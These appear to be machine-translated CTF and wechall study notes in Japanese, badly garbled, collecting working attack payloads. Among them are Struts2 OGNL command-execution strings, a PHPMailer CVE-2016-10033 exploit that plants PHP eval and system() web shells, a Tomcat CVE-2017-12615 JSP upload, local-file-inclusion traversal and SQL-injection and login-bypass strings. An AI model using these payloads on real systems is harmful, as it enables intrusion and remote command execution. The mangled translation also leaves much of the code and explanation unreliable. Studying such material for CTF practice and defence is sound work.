インクの大学にノート、wechallベース
S-007
情報化時代を埋めるには、エラープロンプト発見した
'+ +(#アプリケーション)'塗りつぶしを
、エコーを発見した脆弱性の存在を証明する
「+(#_memberAccess [ ":ペイロード真、#fooという=新しいJavaを= allowStaticMethodAccessを"] .lang.Boolean( "偽")、#コンテキスト[ "xwork.MethodAccessor.denyMethodExecution"] =#FOO、@ org.apache.commons.io.IOUtils @のtoString(@ java.lang.Runtime @ getRuntime()。EXEC ( 'LS /')。のgetInputStream '()))+
ここでは' ++「引用符の閉鎖端のためには、LS /実行され、応答がburpsuiteを表示することをお勧めします
S-001
情報を入力し、元の発見情報は、充填エコー
%+ 1} {1、2エコー充填暗号を、抜け穴記述がある
ペイロードは:
%のA = {#(新しい新しいjava.lang.ProcessBuilder(新しい新java.lang.Stringで[] { "LS"、 "/"}))。redirectErrorStream(真).start()、#Bの=#1 a.getInputStream()、#1 C =新しいjava.io.InputStreamReader(#B )、#Dは=新しいjava.io.BufferedReader( #C)、#E =新しいCHAR [50000]、#1 d.read(#E)、#1、F =#1 context.get(「com.opensymphony.xwork2.dispatcher .HttpServletResponse「)、#f.getWriter() }のprintln(新しいjava.lang.Stringで(#E))、#f.getWriter()。フラッシュ()、#f.getWriter()。閉じる()
このようなスペース必要なコマンドを入力する種は、「」、新しいjava.lang.Stringで[] { 『WHOAMI』である場合にのみWHOAMI離間しました )}
CVE-2016から10033 phpmailerの
phpmailerのメールを送信するときに、ユーザーがコードインジェクション攻撃をフィルタリングすることができることを十分には存在しないので、sendmailのメールシステム機能は、メソッドを使用しています
経験:
「攻撃者の\」-O-Q / tmpの-X-は/ var / WWW / HTML /いくつかの「@ example.com建設メールボックスhack.php
<PHPの@Eval($ _ POST [影を]);?> メッセージは、
チョッパ接続、その後、送信するために立ち往生でしょう、直接アクセス/hack.php、正常にアップロードされていることが発見されます
ワードトロイの木馬は<PHP(ISSET($ _かのように書き換えることができる REQUEST [ 'CMD'])){$ CMD =($ _REQUEST [ "CMD"]);?システム($ CMD); "$のCMD"エコー;ダイ;}?>
あなたがリモートでキーを取得するためのコマンドを実行することができ、その後/hack.php/?cmd=にアクセスすることができます
濾過SQLインジェクションの文字の後に手動
=ような、また、URLエンコードよう置き換えることによって、/と** /スペース、残りの符号化されたキーのURL(デジタル必須ではない)を交換
PHPは、地元の脆弱性が含まれ
、ソースを見るコメントr.phpがthe_key_is_here.txtのP TXTという名前の変数、およびキー含めるよう求め見つかり
ペイロード:/r.php P = .. / .. / .. / .. / the_key_is_hereを? ファイルを読むためのディレクトリ全体../付き
手で注入SQLiteのは
まだ」を使用し、1 = 1、とされている 1 = 2 と判定された
デジタル型注入を見つけ、Nによって順序がフィールドの数を判断する
組合が通常のエコー表示すること1,2、...、Nを選択
組合1を選択しますsqlite_masterバーストテーブルおよび列の名前(名前は、テーブル名、SQL列名である)から、名前、SQL、4
ユニオンSELECTテーブル限界N、1(N> =から1、名前、パスワード,. 4 0) バーストフィールド値
Tomcatのリモートでコードが実行される脆弱性CVE-2017から12615
の脆弱性条件:する偽の読み取り専用のorg.apache.catalina.servlets.DefaultServlet
ページを更新し、bpのキャプチャ、変更されたポストを取得し、アドレス構造/xxx.jsp/(またはJSP%20、 JSP :: $ DATA)
コンテンツ転送JSPの馬
PHPグローバル脆弱性wechallの
監査は、コードが見つかりました:IF(ISSET($ログイン))
IF(strtolower($ログイン[0])=== 'ADMIN')XXXの
ペイロード:? globals.phpログイン[0] = ADMIN
制限付きアクセスはwechall
.htaccessファイル保護機能によって促さ
:見つけオープンの.htaccess、
AuthUserFileは.htpasswdの
<リミットGET>
、burpsuiteキャプチャポストの変更を取得し、コンテンツの.htpasswdを転送:ペイロードを
トレーニング:PHP LFIの
$ファイル名= 'ページと/'(ISSET($ _ GET [ "ファイル"])$ _ GET [ "ファイル"]?: "購入のために利用可能である")で見つかった検証コード'HTML'; ..
ペイロード:ファイル=。 ./../solution.php%00
トレーニング:クリプト-シーザーII
タイトルデータを16進数で与えられ、バイナリデータは、最初の10に変換され
、その後、プログラムを書き、128〜1(被写体TIPS)オフセットデジタルデータアレイ、及び最終的に出力列へ
トレーニング:MySQLのIIの
パスワードおよびフィルタなしのユーザー名の別々の認証、ユーザー名、クエリ建設組合をバイパスして、利用可能な選択
:ペイロード
:アカウント組合は1を選択し、「管理 ;#1「MD5(」パスワード「)
パスワード:パスワード
マスターパスワードを拡張:
「UNIONのADMIN 1,1,1から選択しました」「=」
逃げ場
コアコード"UPDATE noescvotes SET` $ who` = ` $ who` + 1 WHERE ID = 1"は、これは`使用しないことに注意してください'
ペイロード:ビル' = 111 - 20%である
比較的noescvotes set`紙幣を更新`= 111 - %20` = ' $ who` + 1 WHERE ID = 1"
トレーニング:私はエンコーディング
01ヤードの束を与える権利を有する、英語に翻訳示唆およびツールに与え
ペイロード:推測は最初、デフォルトで8のグループをグループ化されたバイナリ形式、1以上のゼロで、バイナリで、7パケットを試してみてください、パケットが完了しています、その後、バイナリはASCIIに
まとめ注入マスターパスワードの
文字:
。。。。 'または' 1 '=' 1 / 'または' 1 '=' 1
'または' '=' / 'または' '='
組合ADMIN SELECTからどこ1,1,1 '' = '/ 1(構成テーブルをと仮定すると管理者ID、ユーザ名、パスワードです)
数値:
'または1 = 1#(#を交換/またはすることができます* - )
管理者'#
' = '/' = '
ログ分析は、
メモ帳(*。)、定期的なマッチングのアップロードをログファイルを開く(PHP | JSP | ASP)を、 アップロードされた馬と対応するIPハッカーを見つけます